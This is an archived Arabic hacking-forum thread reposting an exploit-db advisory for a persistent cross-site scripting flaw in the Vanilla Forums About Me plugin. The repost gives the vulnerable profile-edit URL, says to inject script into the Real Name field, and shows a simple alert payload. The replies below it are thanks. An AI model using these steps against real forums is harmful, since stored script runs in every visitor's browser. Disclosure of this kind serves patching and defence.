ثغره جديده { Vanilla Forums About Me Plugin Persistant XSS } [الأرشيف]

مشاهدة النسخة كاملة : ثغره جديده { Vanilla Forums About Me Plugin Persistant XSS }

اخلاقي تاج راسي

05-21-2012, 08:05 PM

بسم الله الرحمن الرحيم

# Title: Vanilla About Me Plugin Persistant XSS Vulnerability
# Date: 18/5/12
# Author: Henry Hoggard
# Author URL: henryhoggard.co.uk
# Author Twitter: @henryhoggard
# Software: Vanilla Version 2.0.18.4 + About Me 1.1.1
# http://vanillaforums.org/addon/aboutme-plugin
# http://http://vanillaforums.org
################################################## ###########

Go to http://target.tld/index.php?p=/profile/editme/4/testmember

Post your XSS In any of the text fields, for this we used the Real Name Field and the following XSS

XSS:
**********alert('x')</script>

Then if a user visits your about me page (http://target.tld/index.php?p=/profile/aboutme/4/testmember) the script will execute

################################################## ###########

http://henryhoggard.co.uk

رابط الثغره : http://www.exploit-db.com/exploits/18911

تحيآتي :wink:

yousef zidan

05-21-2012, 09:16 PM

مشكور و الله يعطك العافية

يارب رحمتك

05-24-2012, 02:12 AM

شكرا بس مواضيعك عن الثغرات كتيرة الواحد مش عارف ياخد اية ولا اية :- ههههههههههههه

بالتوفيق عزيزى ... ونتظر جديدك...!! :)

اخلاقي تاج راسي

05-24-2012, 05:01 AM

مشكور و الله يعطك العافية

ربي يعافيكـ و يقويكـ

اخلاقي تاج راسي

05-24-2012, 05:07 AM

شكرا بس مواضيعك عن الثغرات كتيرة الواحد مش عارف ياخد اية ولا اية :- ههههههههههههه

بالتوفيق عزيزى ... ونتظر جديدك...!!

أهلاً بكـ يآ رب رحمتكـ

اشكركـ يا اخي العزيز على مروركـ
وأوعدكـ بجديد { إن شاء الله }
تحياتي